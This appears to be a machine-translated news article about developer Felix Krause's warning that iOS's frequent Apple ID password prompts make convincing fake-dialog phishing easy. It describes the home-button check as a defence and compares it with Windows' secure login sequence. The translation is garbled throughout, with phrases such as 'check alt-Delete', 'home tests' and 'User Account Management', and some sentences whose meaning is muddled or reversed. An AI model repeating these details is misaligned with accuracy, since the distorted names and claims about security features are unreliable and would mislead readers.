The iPhone habit of repeatedly asking for your Apple ID password with few explanations or warnings is not only annoying: it is also a security error that can make attackers extremely convincing phishing attacks, warned an iOS developer.
Regular users of iPhones or iPads will be used to provide sporadic requests from the operating system to enter their Apple ID password appear in the middle of other activities and prevent them from continuing until they join the application.
It can be frustrating, especially if the password is long and complicated, and it can often be difficult to figure out why the device exactly needs your login information. But according to developer Felix Krause, continuous requests are more than just irritation.
“Users have been trained to simply enter their Apple ID password when prompted by iOS, these pop-ups will not only appear on the lock screen and the home screen, but also in random applications, for example, when they want to access to iCloud, GameCenter or in-app purchases, “said Krause.
“This can be easily exploited by any application, simply by showing [a warning] that looks exactly like the system dialog, even users who know a lot about technology have trouble detecting such notifications as phishing attacks.”
Apple’s default alerts are similar to those of normal developers, Krause said, which means that a well-made pop-up phishing window can not give any visual warning that something is happening.
As it is now seen, there is only one way in which a user can be sure that the password request comes from Apple and not from a fraudulent application, said Krause: press the start button before entering the password. That’s because only Apple can respond to home tests. Any other application is forced to close and, therefore, the counterfeit comes out.
There is no evidence that Krause’s proposal has been implemented in practice by an unscrupulous developer and to use it for an effective phishing attack, there are two more obstacles to overcome: the application must go beyond the Apple reviewers to be in the App Store they see, and the developer must convince the users to install it.
However, the problem with Apple has been a big problem in recent years. The “security overload”, or the risk that users feel so overwhelmed by security functions that really create uncertainty, is a long-term problem.
It is famous that Windows Vista has been launched with a feature called User Account Management, which was designed to prevent malicious programs from taking over an infected computer. But in practice, this meant that the operating system interrupted the user to request permission almost every time a program wanted to do something. That meant that users quickly learned to keep clicking without reading the dialogue, revoking any security progress, and finally forced Microsoft to completely replace the feature in Windows 7.
But before, Microsoft had solved one of the problems that iOS is currently experiencing. In its versions of Windows for Business Clients, it was an ingenious way to guarantee that the malware could not request a user password: you can only access the actual login screen in those Windows versions, check alt-Delete, that only Microsoft can answer.
It is the same idea as Felix Krause’s suggestion to press the start button before entering passwords, except that it was implemented almost 20 years ago. The more things change, the more they stay the same.